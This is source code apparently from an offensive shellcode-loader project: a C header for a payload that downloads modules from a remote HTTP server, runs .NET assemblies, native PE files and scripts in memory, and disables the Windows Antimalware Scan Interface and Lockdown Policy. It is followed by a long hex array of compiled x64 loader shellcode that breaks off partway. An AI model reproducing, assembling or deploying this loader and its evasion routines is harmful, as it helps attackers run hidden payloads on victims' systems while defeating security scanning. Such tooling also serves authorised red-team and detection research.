28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef PAYLOAD_H | |
32 | #define PAYLOAD_H | |
33 | ||
34 | #if !defined(_MSC_VER) | |
35 | #define __out_ecount_full(x) | |
36 | #define __out_ecount_full_opt(x) | |
37 | #include <inttypes.h> | |
38 | #endif | |
39 | ||
40 | #include <windows.h> | |
41 | #include <wincrypt.h> | |
42 | #include <oleauto.h> | |
43 | #include <objbase.h> | |
44 | #include <wininet.h> | |
45 | ||
46 | #pragma comment(lib, "wininet.lib") | |
47 | #pragma comment(lib, "advapi32.lib") | |
48 | #pragma comment(lib, "crypt32.lib") | |
49 | ||
50 | #if defined(DEBUG) | |
51 | #include <stdio.h> | |
52 | #include <string.h> | |
53 | ||
54 | #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__) | |
55 | ||
56 | #define DPRINT(...) { \ | |
57 | fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \ | |
58 | fprintf(stderr, __VA_ARGS__); \ | |
59 | } | |
60 | #else | |
61 | #define DPRINT(...) // Don't do anything in release builds | |
62 | #endif | |
63 | ||
64 | #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ | |
65 | (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ | |
66 | (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) | |
67 | ||
68 | // Relative Virtual Address to Virtual Address | |
69 | #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva) | |
70 | ||
71 | #if defined(_M_IX86) || defined(__i386__) | |
72 | // return pointer to code in memory | |
73 | char *get_pc(void); | |
74 | ||
75 | // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload | |
76 | #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr)) | |
77 | #else | |
78 | #define ADR(type, addr) (type)(addr) // do nothing on 64-bit | |
79 | #endif | |
80 | ||
81 | void *Memset(void *ptr, int value, size_t num); | |
82 | void *Memcpy(void *destination, const void *source, size_t num); | |
83 | int Memcmp(const void *ptr1, const void *ptr2, size_t num); | |
84 | ||
85 | #if !defined(_MSC_VER) | |
86 | #define memcmp(x,y,z) Memcmp(x,y,z) | |
87 | #endif | |
88 | ||
89 | #include "peb.h" // Process Environment Block | |
90 | #include "winapi.h" // Prototypes | |
91 | #include "clr.h" // Common Language Runtime Interface | |
92 | ||
93 | #include "donut.h" | |
94 | ||
95 | #include "amsi.h" // Anti-malware Scan Interface | |
96 | #include "activescript.h" // Interfaces for executing VBS/JS files | |
97 | #include "wscript.h" // Interfaces to support WScript object | |
98 | ||
99 | typedef struct { | |
100 | IActiveScriptSite site; | |
101 | IActiveScriptSiteWindow siteWnd; | |
102 | IHost wscript; | |
103 | HANDLE hEvent; | |
104 | PDONUT_INSTANCE inst; // | |
105 | } MyIActiveScriptSite; | |
106 | ||
107 | // internal structure | |
108 | typedef struct _DONUT_ASSEMBLY { | |
109 | ICLRMetaHost *icmh; | |
110 | ICLRRuntimeInfo *icri; | |
111 | ICorRuntimeHost *icrh; | |
112 | IUnknown *iu; | |
113 | AppDomain *ad; | |
114 | Assembly *as; | |
115 | Type *type; | |
116 | MethodInfo *mi; | |
117 | } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY; | |
118 | ||
119 | // Downloads a module from remote HTTP server into memory | |
120 | BOOL DownloadModule(PDONUT_INSTANCE); | |
121 | ||
122 | // .NET DLL/EXE | |
123 | BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
124 | BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
125 | VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
126 | ||
127 | // Extensible Stylesheet Language Transformations | |
128 | VOID RunXSL(PDONUT_INSTANCE); | |
129 | ||
130 | // In-Memory execution of native DLL | |
131 | VOID RunPE(PDONUT_INSTANCE); | |
132 | ||
133 | // VBS / JS files | |
134 | VOID RunScript(PDONUT_INSTANCE); | |
135 | ||
136 | // Disables Antimalware Scan Interface | |
137 | BOOL DisableAMSI(PDONUT_INSTANCE); | |
138 | ||
139 | // Disables Windows Lockdown Policy | |
140 | BOOL DisableWLDP(PDONUT_INSTANCE); | |
141 | ||
142 | LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG); | |
143 | ||
144 | #endif |
0 | ||
1 | unsigned char PAYLOAD_EXE_X64[] = { | |
2 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, | |
3 | 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48, | |
4 | 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48, | |
5 | 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, | |
6 | 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34, | |
7 | 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
8 | 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
9 | 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, | |
10 | 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45, | |
11 | 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0, | |
12 | 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00, | |
13 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, | |
14 | 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, | |
15 | 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8, | |
16 | 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, | |
17 | 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, | |
18 | 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10, | |
19 | 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, | |
20 | 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41, | |
21 | 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, | |
22 | 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, | |
23 | 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8, | |
24 | 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48, | |
25 | 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
26 | 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89, | |
27 | 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
28 | 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a, | |
29 | 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00, | |
30 | 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18, | |
31 | 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00, | |
32 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, | |
33 | 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, | |
34 | 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, | |
35 | 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
36 | 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, | |
37 | 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, | |
38 | 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b, | |
39 | 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00, | |
40 | 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, | |
41 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, | |
42 | 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7, | |
43 | 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45, | |
44 | 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, | |
45 | 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8, | |
46 | 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48, | |
47 | 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2, | |
48 | 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, | |
49 | 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f, | |
50 | 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, | |
51 | 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d, | |
52 | 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, | |
53 | 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10, | |
54 | 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48, | |
55 | 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
56 | 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, | |
57 | 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, | |
58 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, | |
59 | 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50, | |
60 | 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00, | |
61 | 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45, | |
62 | 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, | |
63 | 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, | |
64 | 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, | |
65 | 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, | |
66 | 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, | |
67 | 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b, | |
68 | 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, | |
69 | 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, | |
70 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b, | |
71 | 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95, | |
72 | 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, | |
73 | 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70, | |
74 | 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c, | |
75 | 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, | |
76 | 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a, | |
77 | 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48, | |
78 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b, | |
79 | 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26, | |
80 | 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48, | |
81 | 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb, | |
82 | 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, | |
83 | 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, | |
84 | 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, | |
85 | 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45, | |
86 | 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, | |
87 | 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0, | |
88 | 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00, | |
89 | 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, | |
90 | 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, | |
91 | 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
92 | 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
93 | 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8, | |
94 | 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, | |
95 | 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0, | |
96 | 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, | |
97 | 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, | |
98 | 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48, | |
99 | 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02, | |
100 | 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
101 | 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, | |
102 | 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02, | |
103 | 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00, | |
104 | 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, | |
105 | 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01, | |
106 | 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, | |
107 | 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, | |
108 | 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00, | |
109 | 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00, | |
110 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
111 | 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, | |
112 | 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, | |
113 | 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, | |
114 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, | |
115 | 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01, | |
116 | 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, | |
117 | 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, | |
118 | 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00, | |
119 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00, | |
120 | 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, | |
121 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, | |
122 | 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
123 | 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00, | |
124 | 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00, | |
125 | 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8, | |
126 | 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08, | |
127 | 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00, | |
128 | 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, | |
129 | 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, | |
130 | 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, | |
131 | 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, | |
132 | 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
133 | 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00, | |
134 | 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, | |
135 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
136 | 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c, | |
137 | 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7, | |
138 | 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00, | |
139 | 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, | |
140 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, | |
141 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89, | |
142 | 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00, | |
143 | 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, | |
144 | 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00, | |
145 | 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00, | |
146 | 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80, | |
147 | 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
148 | 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00, | |
149 | 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, | |
150 | 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, | |
151 | 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00, | |
152 | 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, | |
153 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, | |
154 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, | |
155 | 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, | |
156 | 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, | |
157 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
158 | 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00, | |
159 | 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, | |
160 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, | |
161 | 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0, | |
162 | 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02, | |
163 | 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00, | |
164 | 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, | |
165 | 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00, | |
166 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, | |
167 | 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, | |
168 | 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95, | |
169 | 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48, | |
170 | 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba, | |
171 | 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00, | |
172 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
173 | 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00, | |
174 | 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, | |
175 | 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, | |
176 | 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, | |
177 | 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, | |
178 | 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07, | |
179 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
180 | 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38, | |
181 | 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, | |
182 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
183 | 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41, | |
